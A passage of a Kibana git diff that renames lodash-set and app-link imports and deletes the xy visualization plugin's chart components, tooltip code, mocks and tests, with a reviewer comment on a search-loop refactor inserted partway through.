dataViews[i].name ? dataViews[i].name : dataViews[i].title; + if (label && label.toLowerCase().includes(searchValue.toLowerCase())) { options.push({ - label: idsAndTitles[i].title, - value: idsAndTitles[i].id, + label, + value: dataViews[i].id, }); } } diff --git a/src/plugins/unified_search/tsconfig.json b/src/plugins/unified_search/tsconfig.json index 41dc76f1305be..61b1f83058821 100644 --- a/src/plugins/unified_search/tsconfig.json +++ b/src/plugins/unified_search/tsconfig.json 
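Review bot: In the `index_pattern_select.tsx` hunk the search term is lowercased on every loop iteration and `dataViews[i]` is re-read four times per entry; hoisting `const needle = searchValue.toLowerCase();` above the loop, iterating with `for (const { id, name, title } of dataViews) {`, and writing `const label = name || title;` (identical to the added ternary) reads more clearly and avoids the repeated indexing. The added `label &&` guard silently drops any data view that has neither `name` nor `title`; if `getIdsWithTitle()` is not expected to return such entries, a comment like `// skip entries with no displayable label` would make that intent explicit. The hunk appears partially collapsed in this view, and the enclosing method starts before it.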
@@ -17,6 +17,7 @@ { "path": "../../core/tsconfig.json" }, { "path": "../data/tsconfig.json" }, { "path": "../data_views/tsconfig.json" }, + { "path": "../embeddable/tsconfig.json" }, { "path": "../usage_collection/tsconfig.json" }, { "path": "../kibana_utils/tsconfig.json" }, { "path": "../kibana_react/tsconfig.json" }, diff --git a/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js b/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js index 4ac63bd8704bc..cccc21e7cbdb1 100644 --- a/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js +++ b/src/plugins/vis_types/timeseries/public/application/components/lib/convert_series_to_vars.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { startsWith, snakeCase } from 'lodash'; import { BUCKET_TYPES, DATA_FORMATTERS } from '../../../../common/enums'; import { getLastValue } from '../../../../common/last_value_utils'; diff --git a/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js b/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js index dc3922453a0e2..66a01793a0e96 100644 --- a/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js +++ b/src/plugins/vis_types/timeseries/public/application/components/vis_types/table/vis.js 
@@ -10,7 +10,7 @@ import _, { isArray, last, get } from 'lodash'; import React, { Component } from 'react'; import { parse as parseUrl } from 'url'; import PropTypes from 'prop-types'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; import { getMetricsField } from '../../lib/get_metrics_field'; import { createTickFormatter } from '../../lib/tick_formatter'; import { createFieldFormatter } from '../../lib/create_field_formatter'; @@ -271,15 +271,13 @@ class TableVis extends Component { return ( - - - {header} - {rows} -
+ +
+ + {header} + {rows} +
+
{accessDeniedDrilldownUrl && ( (accessor ?? '').split('-').pop() ?? ''; + export interface Serie { id: string; rawId: string; diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js b/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js index 18958b6439a8c..2a5ab819c00ac 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import d3 from 'd3'; import { SCALE_MODES } from './scale_modes'; diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js b/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js index 32a41ec5ed489..a9ffe384ee78f 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js @@ -7,7 +7,7 @@ */ import d3 from 'd3'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; const defaults = { diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js b/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js index cc9e48897d053..3b60481c0affe 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js @@ -9,7 +9,7 @@ /** * Provides vislib configuration, throws error if invalid property is accessed without providing defaults */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { vislibTypesConfig as visTypes } from './types'; import { Data } from './data'; diff --git a/src/plugins/vis_types/xy/common/index.ts b/src/plugins/vis_types/xy/common/index.ts index f17bc8476d9a6..da2c02d6145d2 100644 
--- a/src/plugins/vis_types/xy/common/index.ts +++ b/src/plugins/vis_types/xy/common/index.ts @@ -14,8 +14,3 @@ export enum ChartType { Area = 'area', Histogram = 'histogram', } - -/** - * Type of xy visualizations - */ -export type XyVisType = ChartType | 'horizontal_bar'; diff --git a/src/plugins/vis_types/xy/kibana.json b/src/plugins/vis_types/xy/kibana.json index 45f1c36331dfb..fa942c1530142 100644 --- a/src/plugins/vis_types/xy/kibana.json +++ b/src/plugins/vis_types/xy/kibana.json @@ -3,9 +3,8 @@ "version": "kibana", "ui": true, "server": true, - "requiredPlugins": ["charts", "data", "expressions", "visualizations", "fieldFormats"], - "requiredBundles": ["kibanaUtils", "visDefaultEditor", "kibanaReact"], - "optionalPlugins": ["usageCollection"], + "requiredPlugins": ["charts", "visualizations", "data", "expressions"], + "requiredBundles": ["kibanaUtils", "visDefaultEditor"], "extraPublicDirs": ["common/index"], "owner": { "name": "Vis Editors", diff --git a/src/plugins/vis_types/xy/public/_chart.scss b/src/plugins/vis_types/xy/public/_chart.scss deleted file mode 100644 index ac9d4ed04aec4..0000000000000 --- a/src/plugins/vis_types/xy/public/_chart.scss +++ /dev/null @@ -1,7 +0,0 @@ -.xyChart__container { - position: absolute; - top: 0; - right: 0; - bottom: 0; - left: 0; -} diff --git a/src/plugins/vis_types/xy/public/chart_split.tsx b/src/plugins/vis_types/xy/public/chart_split.tsx deleted file mode 100644 index e1d096334f17c..0000000000000 --- a/src/plugins/vis_types/xy/public/chart_split.tsx +++ /dev/null 
@@ -1,43 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { Accessor, AccessorFn, GroupBy, SmallMultiples, Predicate } from '@elastic/charts'; - -interface ChartSplitProps { - splitColumnAccessor?: Accessor | AccessorFn; - splitRowAccessor?: Accessor | AccessorFn; -} - -const CHART_SPLIT_ID = '__chart_split__'; - -export const ChartSplit = ({ splitColumnAccessor, splitRowAccessor }: ChartSplitProps) => { - if (!splitColumnAccessor && !splitRowAccessor) return null; - - return ( - <> - { - const splitTypeAccessor = splitColumnAccessor || splitRowAccessor; - if (splitTypeAccessor) { - return typeof splitTypeAccessor === 'function' - ? splitTypeAccessor(datum) - : datum[splitTypeAccessor]; - } - return spec.id; - }} - sort={Predicate.DataIndex} - /> - - - ); -}; diff --git a/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss b/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss deleted file mode 100644 index 91b0a8d023290..0000000000000 --- a/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss +++ /dev/null 
@@ -1,34 +0,0 @@ -.detailedTooltip { - @include euiToolTipStyle('s'); - pointer-events: none; - max-width: $euiSizeXL * 10; - overflow: hidden; - padding: $euiSizeS; - - table { - td, - th { - text-align: left; - padding: $euiSizeXS; - overflow-wrap: break-word; - word-wrap: break-word; - } - } -} - -.detailedTooltip__header { - > :last-child { - margin-bottom: $euiSizeS; - } -} - -.detailedTooltip__labelContainer, -.detailedTooltip__valueContainer { - overflow-wrap: break-word; - word-wrap: break-word; -} - -.detailedTooltip__label { - font-weight: $euiFontWeightMedium; - color: shade($euiColorGhost, 20%); -} diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts b/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts deleted file mode 100644 index bc6a1f292dad3..0000000000000 --- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts +++ /dev/null 
@@ -1,187 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export const aspects = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-1', - column: 1, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], -}; - -export const aspectsWithSplitColumn = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - splitColumn: { - accessor: 'col-1-4', - column: 1, - title: 'Cancelled: Descending', - format: { - id: 'terms', - params: { - id: 'boolean', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '4', - params: {}, - }, -}; - -export const aspectsWithSplitRow = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - 
intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-3-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - splitRow: { - accessor: 'col-1-5', - column: 1, - title: 'Carrier: Descending', - format: { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '4', - params: {}, - }, -}; - -export const header = { - seriesIdentifier: { - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{area-col-1-1}yAccessor{col-1-1}splitAccessors{}smV{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}smH{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}', - specId: 'area-col-1-1', - yAccessor: 'col-1-1', - splitAccessors: {}, - seriesKeys: ['col-1-1'], - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - }, - valueAccessor: 'y1', - label: 'Count', - value: 1611817200000, - formattedValue: '1611817200000', - markValue: null, - color: '#54b399', - isHighlighted: false, - isVisible: true, -}; - -export const value = { - seriesIdentifier: { - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{area-col-1-1}yAccessor{col-1-1}splitAccessors{}smV{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}smH{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}', - specId: 'area-col-1-1', - yAccessor: 'col-1-1', - splitAccessors: [], - seriesKeys: ['col-1-1'], - smVerticalAccessorValue: 'kibana', - smHorizontalAccessorValue: 'false', - }, - valueAccessor: 'y1', - label: 'Count', - value: 52, - formattedValue: '52', - markValue: null, - color: '#54b399', - isHighlighted: true, - isVisible: true, -}; diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx b/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx deleted file mode 100644 index aa76b680f6cc0..0000000000000 
--- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx +++ /dev/null @@ -1,62 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getTooltipData } from './detailed_tooltip'; -import { - aspects, - aspectsWithSplitColumn, - aspectsWithSplitRow, - header, - value, -} from './detailed_tooltip.mock'; - -describe('getTooltipData', () => { - it('returns an array with the header and data information', () => { - const tooltipData = getTooltipData(aspects, header, value); - expect(tooltipData).toStrictEqual([ - { - label: 'timestamp per 3 hours', - value: '1611817200000', - }, - { - label: 'Count', - value: '52', - }, - ]); - }); - - it('returns an array with the data information if the header is not applied', () => { - const tooltipData = getTooltipData(aspects, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Count', - value: '52', - }, - ]); - }); - - it('returns an array with the split column information if it is provided', () => { - const tooltipData = getTooltipData(aspectsWithSplitColumn, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Cancelled: Descending', - value: 'false', - }, - ]); - }); - - it('returns an array with the split row information if it is provided', () => { - const tooltipData = getTooltipData(aspectsWithSplitRow, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Carrier: Descending', - value: 'kibana', - }, - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx b/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx deleted file mode 100644 index a7eb7a909615b..0000000000000 
--- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx
+++ /dev/null
@@ -1,146 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { isNil } from 'lodash'; - -import { - CustomTooltip, - TooltipValue, - TooltipValueFormatter, - XYChartSeriesIdentifier, -} from '@elastic/charts'; - -import { Aspects } from '../types'; - -import './_detailed_tooltip.scss'; -import { COMPLEX_SPLIT_ACCESSOR, isRangeAggType } from '../utils/accessors'; - -interface TooltipData { - label: string; - value: string; -} - -export const getTooltipData = ( - aspects: Aspects, - header: TooltipValue | null, - value: TooltipValue -): TooltipData[] => { - const data: TooltipData[] = []; - - if (header) { - const xFormatter = isRangeAggType(aspects.x.aggType) ? null : aspects.x.formatter; - data.push({ - label: aspects.x.title, - value: xFormatter ? xFormatter(header.value) : `${header.value}`, - }); - } - - const valueSeries = value.seriesIdentifier as XYChartSeriesIdentifier; - const yAccessor = aspects.y.find(({ accessor }) => accessor === valueSeries.yAccessor) ?? null; - - if (yAccessor) { - data.push({ - label: yAccessor.title, - value: yAccessor.formatter ? yAccessor.formatter(value.value) : `${value.value}`, - }); - } - - if (aspects.z && !isNil(value.markValue)) { - data.push({ - label: aspects.z.title, - value: aspects.z.formatter ? aspects.z.formatter(value.markValue) : `${value.markValue}`, - }); - } - - valueSeries.splitAccessors.forEach((splitValue, key) => { - const split = (aspects.series ?? 
[]).find(({ accessor }, i) => { - return accessor === key || key === `${COMPLEX_SPLIT_ACCESSOR}::${i}`; - }); - - if (split) { - data.push({ - label: split?.title, - value: - split?.formatter && !key.toString().startsWith(COMPLEX_SPLIT_ACCESSOR) - ? split?.formatter(splitValue) - : `${splitValue}`, - }); - } - }); - - if ( - aspects.splitColumn && - valueSeries.smHorizontalAccessorValue !== undefined && - valueSeries.smHorizontalAccessorValue !== undefined - ) { - data.push({ - label: aspects.splitColumn.title, - value: `${valueSeries.smHorizontalAccessorValue}`, - }); - } - - if ( - aspects.splitRow && - valueSeries.smVerticalAccessorValue !== undefined && - valueSeries.smVerticalAccessorValue !== undefined - ) { - data.push({ - label: aspects.splitRow.title, - value: `${valueSeries.smVerticalAccessorValue}`, - }); - } - - return data; -}; - -const renderData = ({ label, value }: TooltipData, index: number) => { - return label && value ? ( - - -
{label}
- - - -
{value}
- - - ) : null; -}; - -export const getDetailedTooltip = - (aspects: Aspects) => - (headerFormatter?: TooltipValueFormatter): CustomTooltip => { - return function DetailedTooltip({ header, values }) { - // Note: first value is not necessarily the closest value - // To be fixed with https://github.com/elastic/elastic-charts/issues/835 - // TODO: Allow multiple values to be displayed in tooltip - const highlightedValue = values.find(({ isHighlighted }) => isHighlighted); - - if (!highlightedValue) { - return null; - } - - const tooltipData = getTooltipData(aspects, header, highlightedValue); - - if (tooltipData.length === 0) { - return null; - } - - return ( -
- {headerFormatter && header && ( -
{headerFormatter(header)}
- )} - - {tooltipData.map(renderData)} -
-
- ); - }; - }; diff --git a/src/plugins/vis_types/xy/public/components/index.ts b/src/plugins/vis_types/xy/public/components/index.ts deleted file mode 100644 index 7aaeb17ab2828..0000000000000 --- a/src/plugins/vis_types/xy/public/components/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { XYAxis } from './xy_axis'; -export { XYEndzones } from './xy_endzones'; -export { XYCurrentTime } from './xy_current_time'; -export { XYSettings } from './xy_settings'; -export { XYThresholdLine } from './xy_threshold_line'; diff --git a/src/plugins/vis_types/xy/public/components/xy_axis.tsx b/src/plugins/vis_types/xy/public/components/xy_axis.tsx deleted file mode 100644 index b224639bdbff3..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_axis.tsx +++ /dev/null @@ -1,46 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { Axis } from '@elastic/charts'; - -import { AxisConfig } from '../types'; - -type XYAxisPros = AxisConfig; - -export const XYAxis: FC = ({ - id, - title, - show, - position, - groupId, - grid, - ticks, - domain, - style, - integersOnly, - timeAxisLayerCount, -}) => ( - -); 
diff --git a/src/plugins/vis_types/xy/public/components/xy_current_time.tsx b/src/plugins/vis_types/xy/public/components/xy_current_time.tsx deleted file mode 100644 index 68f1dd0d60b13..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_current_time.tsx +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; -import { DomainRange } from '@elastic/charts'; -import { CurrentTime } from '@kbn/charts-plugin/public'; - -interface XYCurrentTime { - enabled: boolean; - isDarkMode: boolean; - domain?: DomainRange; -} - -export const XYCurrentTime: FC = ({ enabled, isDarkMode, domain }) => { - if (!enabled) { - return null; - } - - const domainEnd = domain && 'max' in domain ? domain.max : undefined; - return ; -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_endzones.tsx b/src/plugins/vis_types/xy/public/components/xy_endzones.tsx deleted file mode 100644 index 50982cc30dc3c..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_endzones.tsx +++ /dev/null 
@@ -1,57 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { DomainRange } from '@elastic/charts'; - -import { Endzones } from '@kbn/charts-plugin/public'; - -interface XYEndzones { - enabled: boolean; - isDarkMode: boolean; - isFullBin: boolean; - hideTooltips?: boolean; - domain?: DomainRange; - adjustedDomain?: DomainRange; -} - -export const XYEndzones: FC = ({ - enabled, - isDarkMode, - isFullBin, - hideTooltips, - domain, - adjustedDomain, -}) => { - if ( - enabled && - domain && - adjustedDomain && - 'min' in domain && - 'max' in domain && - domain.minInterval !== undefined && - 'min' in adjustedDomain && - 'max' in adjustedDomain - ) { - return ( - - ); - } - - return null; -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_settings.tsx b/src/plugins/vis_types/xy/public/components/xy_settings.tsx deleted file mode 100644 index f934a2c203196..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_settings.tsx +++ /dev/null 
@@ -1,195 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { - Direction, - Settings, - SettingsProps, - DomainRange, - Position, - PartialTheme, - ElementClickListener, - BrushEndListener, - RenderChangeListener, - LegendAction, - LegendColorPicker, - TooltipProps, - TickFormatter, - VerticalAlignment, - HorizontalAlignment, -} from '@elastic/charts'; - -import { renderEndzoneTooltip } from '@kbn/charts-plugin/public'; - -import { getThemeService } from '../services'; -import { VisConfig } from '../types'; - -declare global { - interface Window { - /** - * Flag used to enable debugState on elastic charts - */ - _echDebugStateFlag?: boolean; - } -} - -type XYSettingsProps = Pick< - VisConfig, - | 'markSizeRatio' - | 'rotation' - | 'enableHistogramMode' - | 'tooltip' - | 'isTimeChart' - | 'xAxis' - | 'orderBucketsBySum' -> & { - onPointerUpdate: SettingsProps['onPointerUpdate']; - externalPointerEvents: SettingsProps['externalPointerEvents']; - xDomain?: DomainRange; - adjustedXDomain?: DomainRange; - showLegend: boolean; - onElementClick: ElementClickListener; - onBrushEnd?: BrushEndListener; - onRenderChange: RenderChangeListener; - legendAction?: LegendAction; - legendColorPicker: LegendColorPicker; - legendPosition: Position; - truncateLegend: boolean; - maxLegendLines: number; - legendSize?: number; - ariaLabel?: string; -}; - -function getValueLabelsStyling() { - const VALUE_LABELS_MAX_FONTSIZE = 12; - const VALUE_LABELS_MIN_FONTSIZE = 10; - - return { - displayValue: { - fontSize: { min: VALUE_LABELS_MIN_FONTSIZE, max: VALUE_LABELS_MAX_FONTSIZE }, - alignment: { horizontal: 
HorizontalAlignment.Center, vertical: VerticalAlignment.Middle }, - }, - }; -} - -export const XYSettings: FC = ({ - markSizeRatio, - rotation, - enableHistogramMode, - tooltip, - isTimeChart, - xAxis, - orderBucketsBySum, - xDomain, - adjustedXDomain, - showLegend, - onElementClick, - onPointerUpdate, - externalPointerEvents, - onBrushEnd, - onRenderChange, - legendAction, - legendColorPicker, - legendPosition, - maxLegendLines, - truncateLegend, - legendSize, - ariaLabel, -}) => { - const themeService = getThemeService(); - const theme = themeService.useChartsTheme(); - const baseTheme = themeService.useChartsBaseTheme(); - const valueLabelsStyling = getValueLabelsStyling(); - - const themeOverrides: PartialTheme = { - markSizeRatio, - barSeriesStyle: { - ...valueLabelsStyling, - }, - crosshair: { - ...theme.crosshair, - }, - legend: { - labelOptions: { maxLines: truncateLegend ? maxLegendLines ?? 1 : 0 }, - }, - axes: { - axisTitle: { - padding: { - outer: 10, - }, - }, - }, - chartMargins: - legendPosition === Position.Top || legendPosition === Position.Right - ? { - bottom: (theme.chartMargins?.bottom ?? 0) + 10, - } - : { - right: (theme.chartMargins?.right ?? 0) + 10, - }, - }; - - const headerValueFormatter: TickFormatter | undefined = xAxis.ticks?.formatter - ? (value) => xAxis.ticks?.formatter?.(value) ?? '' - : undefined; - const headerFormatter = - isTimeChart && xDomain && adjustedXDomain - ? renderEndzoneTooltip( - xDomain.minInterval, - 'min' in xDomain ? xDomain.min : undefined, - 'max' in xDomain ? xDomain.max : undefined, - headerValueFormatter, - !tooltip.detailedTooltip - ) - : headerValueFormatter && - (tooltip.detailedTooltip ? undefined : ({ value }: any) => headerValueFormatter(value)); - - const boundary = document.getElementById('app-fixed-viewport') ?? undefined; - const tooltipProps: TooltipProps = tooltip.detailedTooltip - ? 
{ - ...tooltip, - boundary, - customTooltip: tooltip.detailedTooltip(headerFormatter), - headerFormatter: undefined, - } - : { ...tooltip, boundary, headerFormatter }; - - return ( - - ); -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx b/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx deleted file mode 100644 index f28dbf726d287..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { AnnotationDomainType, LineAnnotation } from '@elastic/charts'; - -import { ThresholdLineConfig } from '../types'; - -type XYThresholdLineProps = ThresholdLineConfig & { - groupId?: string; -}; - -export const XYThresholdLine: FC = ({ - show, - value: dataValue, - color, - width, - groupId, - dash, -}) => { - if (!show) { - return null; - } - - return ( - - ); -}; diff --git a/src/plugins/vis_types/xy/public/config/get_agg_id.ts b/src/plugins/vis_types/xy/public/config/get_agg_id.ts deleted file mode 100644 index 9586d0f082c1a..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_agg_id.ts +++ /dev/null 
@@ -1,14 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-/**
- * Get agg id from accessor
- *
- * For now this is determined by the esaggs column name. Could be cleaned up in the future.
- */
-export const getAggId = (accessor: string) => (accessor ?? '').split('-').pop() ?? '';
diff --git a/src/plugins/vis_types/xy/public/config/get_aspects.ts b/src/plugins/vis_types/xy/public/config/get_aspects.ts
deleted file mode 100644
index ee4b403301d87..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_aspects.ts
+++ /dev/null
@@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { compact } from 'lodash'; - -import { i18n } from '@kbn/i18n'; - -import { DatatableColumn } from '@kbn/expressions-plugin/public'; - -import { Aspect, Dimension, Aspects, Dimensions } from '../types'; -import { getFormatService } from '../services'; -import { getAggId } from './get_agg_id'; - -export function getEmptyAspect(): Aspect { - return { - accessor: null, - aggId: null, - aggType: null, - title: i18n.translate('visTypeXy.aggResponse.allDocsTitle', { - defaultMessage: 'All docs', - }), - params: { - defaultValue: '_all', - }, - }; -} -export function getAspects( - columns: DatatableColumn[], - { x, y, z, series, splitColumn, splitRow }: Dimensions -): Aspects { - const seriesDimensions = Array.isArray(series) || series === undefined ? series : [series]; - - return { - x: getAspectsFromDimension(columns, x) ?? getEmptyAspect(), - y: getAspectsFromDimension(columns, y) ?? [], - z: z && z?.length > 0 ? getAspectsFromDimension(columns, z[0]) : undefined, - series: getAspectsFromDimension(columns, seriesDimensions), - splitColumn: splitColumn?.length ? getAspectsFromDimension(columns, splitColumn[0]) : undefined, - splitRow: splitRow?.length ? 
getAspectsFromDimension(columns, splitRow[0]) : undefined,
- };
-}
-
-function getAspectsFromDimension(
- columns: DatatableColumn[],
- dimension?: Dimension | null
-): Aspect | undefined;
-function getAspectsFromDimension(
- columns: DatatableColumn[],
- dimensions?: Dimension[] | null
-): Aspect[] | undefined;
-function getAspectsFromDimension(
- columns: DatatableColumn[],
- dimensions?: Dimension | Dimension[] | null
-): Aspect[] | Aspect | undefined {
- if (!dimensions) {
- return;
- }
-
- if (Array.isArray(dimensions)) {
- return compact(
- dimensions.map((d) => {
- const column = d && columns[d.accessor];
- return column && getAspect(column, d);
- })
- );
- }
-
- const column = columns[dimensions.accessor];
- return column && getAspect(column, dimensions);
-}
-
-const getAspect = (
- { id: accessor, name: title }: DatatableColumn,
- { accessor: column, format, params, aggType }: Dimension
-): Aspect => ({
- accessor,
- column,
- title,
- format,
- aggType,
- aggId: getAggId(accessor),
- formatter: (value: any) => getFormatService().deserialize(format).convert(value),
- params,
-});
diff --git a/src/plugins/vis_types/xy/public/config/get_axis.test.ts b/src/plugins/vis_types/xy/public/config/get_axis.test.ts
deleted file mode 100644
index 7dddae5702b2e..0000000000000
--- a/src/plugins/vis_types/xy/public/config/get_axis.test.ts
+++ /dev/null
